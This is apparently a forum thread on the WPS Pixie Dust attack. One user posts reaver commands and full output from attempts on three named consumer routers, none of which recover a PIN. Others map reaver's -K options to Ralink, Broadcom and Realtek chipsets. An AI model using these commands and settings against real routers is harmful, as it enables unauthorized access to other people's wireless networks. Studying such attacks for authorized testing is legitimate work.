WPS Pixie Dust Attack (Offline WPS Attack)

[Jynn]

It would be interesting you put the output of reaver.

So we can see what chipset is and other information

I hope the following output of the tests of 3 routers is useful :

root@kali64:~# reaver -i mon0 -b 5C9:98:33:xx:xx -vv -K 1

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
mod by DataHead

Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
[+] Waiting for beacon from 5C9:98:33:xx:xx
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Associated with 5C9:98:33:xx:xx (ESSID: xxxxxxxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: fc:09:f4:f8:14:f7:d8:6a:e0:1f:45:af:39:c7:0f:ad
[P] PKE: 85:84:7e:84:11:31:2e:77:e4:1b:da:ca:e5:be:c5:7f:1f :66:b5:e8:5f:21:f9:54:87:4f:49:ab:f4:bf:2d:93:e8:1 f:f3:92:de:d5:96:0f:98:25:e5:dd:74:d5:5a:ad:85:cc: 5a:f1:9d:c3:17:02:26:89:30:50:b4:e3:43:52:51:56:27 :7a:22:c2:a2:6d:ba:4c:c5:01:2d:ca:0c:21:ac:4c:94:1 2:27:aa:d1:3d:7c:49:bc:26:46:ac:c6:d6:e4:34:50:7c: 91:fd:25:fd:30:07:09:8d:88:5f:46:b8:ed:1e:99:70:42 :1b:29:31:7c:75:9c:56:4a:75:ee:3e:2d:0e:b1:45:e0:1 a:c7:e5:b4:e7:f8:88:bf:ae:87:2e:49:10:92:06:17:94: 49:c0:5d:4c:17:87:79:4c:c8:de:01:b0:0b:24:fb:2d:bd :4c:cb:80:99:7d:b4:d4:fa:af:38:8d:92:b2:77:ac:0d:6 9:9d:58:dc:a9:31:08:98:da
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: DIR-615
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: 9a:86:3f:ff:71:8d:9d:e6:53:e3:a9:d7:e0:f8:95:cf:74 :0e:7e:88:32:67:c9:d1:87:2a:6b:e3:5a:17:88:4e
[+] Sending M2 message
[P] E-Hash1: 31:a7:13:e2:68:e4:4a:6f:af:c7:04:08:6e:5d:93:62:21 :b9:8e:a3:c3:31:47:d2:44:11:49:43:ef:ae:ac:c8
[P] E-Hash2: 3c:60:ee:50:64:40:4a:16:52:73:3f:2c:34:9b:6c:7e:47 :71:9a:bc:71:b6:96:a1:3c:9b:c9:bc:14:ce:6d:76
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]


root@kali64:~# reaver -i mon0 -b 40:16:7E:5D:xx:xx -vv -K 1

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
mod by DataHead

Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
[+] Waiting for beacon from 40:16:7E:5D:xx:xx
[+] Switching mon0 to channel 1
[+] Associated with 40:16:7E:5D:xx:xx (ESSID: xxxxxxxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c3:b1:c2:3b:2a:5f:f3:35:83:c4:d2:68:16:64:d9:76
[P] PKE: ae:90:dd:03:c2:b4:b0:7f:17:5d:c9:cf:3a:d8:6b:ca:1f :24:08:20:55:a8:73:65:6f:61:b7:a3:a8:2c:00:58:fb:d 0:3d:bc:35:a6:f6:10:fc:d2:c1:70:1c:9d:5f:af:d6:ed: 3f:ab:38:ff:86:9d:f7:84:6f:22:3b:cf:1e:9f:bf:cc:a1 :74:07:a1:69:7c:71:75:4e:cf:10:d6:34:d8:3a:b4:07:5 8:50:95:70:73:53:0e:c3:0f:de:34:7d:51:05:ad:74:82: 08:c6:04:ef:f9:42:a8:29:19:0c:68:64:63:ee:77:d8:50 :b6:fb:9e:7d:87:84:86:fe:78:6e:54:15:b6:32:3c:60:9 2:1c:aa:ce:49:a7:13:09:2b:ee:a8:4c:31:d3:09:b6:11: c4:16:32:c5:b9:9e:0d:65:89:96:f1:7f:37:2f:42:75:d2 :cf:50:b6:67:70:a7:1a:28:a8:d1:e8:4a:ec:a9:26:9f:b 7:c8:ea:78:9f:ad:e3:06:a8
[P] WPS Manufacturer: ASUSTeK Computer Inc.
[P] WPS Model Number: RT-N12
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: 8d:9c:e2:47:23:ac:b2:d1:f6:de:cd:d5:c1:d3:3f:41:13 :a4:e7:5c:20:3b:24:7c:f2:1a:4b:19:6f:ca:68:3b
[+] Sending M2 message
[P] E-Hash1: 6b:0f:9b:cd:c8:0e:92:78:13:6f:b8:01:f1:45:0c:3d:99 :88:60:1d:5d:69:6e:e6:55:da:44:a1:d9:61:1f:52
[P] E-Hash2: 0c:16:eb:80:24:18:f5:1a:7d:c3:11:ba:c4:1c:e6:d6:56 :81:31:c3:76:6a:52:1c:4a:c6:5e:ad:0c:51:19:7b
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]



root@kali64:~# reaver -i mon0 -b 64:70:02:5C:xx:xx -vv -K 1

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
mod by DataHead

Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
[?] Restore previous session for 64:70:02:5C:xx:xx? [n/Y] n

[+] Associated with 64:70:02:5C:xx:xx (ESSID: xxxxxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: bf:1e:7d:b5:18:9e:f0:66:22:9c:5e:20:2e:43:31:6c
[P] PKE: 9d:48:eb:a8:25:6e:6b:7d:aa:f5:b9:f2:da:49:66:b9:cd :8f:b1:ab:25:16:ba:7b:df:87:71:7e:d1:e8:af:b1:71:b a:c4:96:89:d8:db:1b:57:2c:61:cc:0e:a4:c6:31:02:38: 43:50:d1:be:b1:83:49:19:3e:8c:ed:9f:55:e5:6e:a7:1a :05:c5:5f:22:e0:c4:ac:d5:5d:d6:bd:32:a8:1d:e2:6f:2 5:78:e6:9a:4d:55:f1:7b:dd:ba:ed:13:7f:33:a6:76:38: af:c2:b5:d6:10:42:eb:98:4e:f6:fe:90:dd:4d:79:d6:08 :d7:3a:0c:86:11:4d:b5:75:76:d7:4c:48:a3:00:33:97:2 c:b5:57:a3:83:1a:5c:58:94:78:53:cf:58:54:c2:1f:fa: ec:91:06:84:d9:95:2a:38:31:72:a2:cc:17:63:a0:13:a0 :9e:7d:cf:cd:14:dd:07:82:76:2c:76:7d:2d:e2:fd:4a:d 9:a2:f4:b0:b1:fc:80:18:b1
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: 08:a0:73:06:7c:1c:bf:77:d9:04:a5:14:90:8f:b6:5d:4b :d7:f5:06:7a:8d:f4:e0:25:88:ae:70:07:d8:f4:82
[+] Sending M2 message
[P] E-Hash1: 2d:55:4e:4a:17:6a:87:ac:33:ae:e4:be:f8:3c:94:f0:d9 :ee:fd:5c:a6:a8:af:96:20:8a:07:e7:5d:cd:cd:35
[P] E-Hash2: 11:f1:24:8c:37:54:fd:3c:5b:f3:b5:66:df:6a:58:e9:9c :f4:2c:9d:d5:ab:4e:36:89:bc:d8:27:9c:ac:15:7d
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]

[soxrok2212]

Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then us the corresponding -K 1,2,3 argument.

[slim76]

Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then us the corresponding -K 1,2,3 argument.

Hello matey,

Any idea what -K option should be used with what chipsets?.

[soxrok2212]

Hello matey,

Any idea what -K option should be used with what chipsets?.

Yeah, I just send a message to t6_x, I think we will be removing those options to make it much simpler. I don't really understand it right now either but I guess I can try...

Code:

The -K option 1 run pixiewps without PKR and the e-s1 = e-s2 = 0
The -K option 2 runs pixiewps without PKR and the e-s1 = e-s2 = 0 but using the -n option of pixiewps (E-Nonce)
The -K option 3 runs pixiewps with PKE, PKR and the hash1 = hash2 = e-once

1 should be used with Ralink and -S used in reaver
2 should be used with Broadcom and -S used in reaver
3 is for Realtek and -S is NOT used in reaver (realtek isn't finished yet... it has worked for me but other users report failures)

[slim76]

Yeah, I just send a message to t6_x, I think we will be removing those options to make it much simpler. I don't really understand it right now either but I guess I can try...

Code:

The -K option 1 run pixiewps without PKR and the e-s1 = e-s2 = 0
The -K option 2 runs pixiewps without PKR and the e-s1 = e-s2 = 0 but using the -n option of pixiewps (E-Nonce)
The -K option 3 runs pixiewps with PKE, PKR and the hash1 = hash2 = e-once

1 should be used with Ralink and -S used in reaver
2 should be used with Broadcom and -S used in reaver
3 is for Realtek and -S is NOT used in reaver (realtek isn't finished yet... it has worked for me but other users report failures)

Cheers for the info matey, its made things much clearer for me. :-)
Cheers again for all your hard work, its greatly appreciated.

[vinneth]

Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then us the corresponding -K 1,2,3 argument.

I only started looking into all things wireless 2 weeks ago, and have been using -K 1 for all attacks because that is the only thing mentioned, if you put number next to the chipset in the menu that would be more intuitive for those who haven't read the full history of this post. I am going through it because I want to see the development from day dot to current but most people I know don't want to do that amount of research before using tools.

Awesome work, as a non-coder (hopefully I develop past script kiddie soon) I am in awe of you

Apologies on posting halfway through reading the entire thread, I jumped the gun a bit.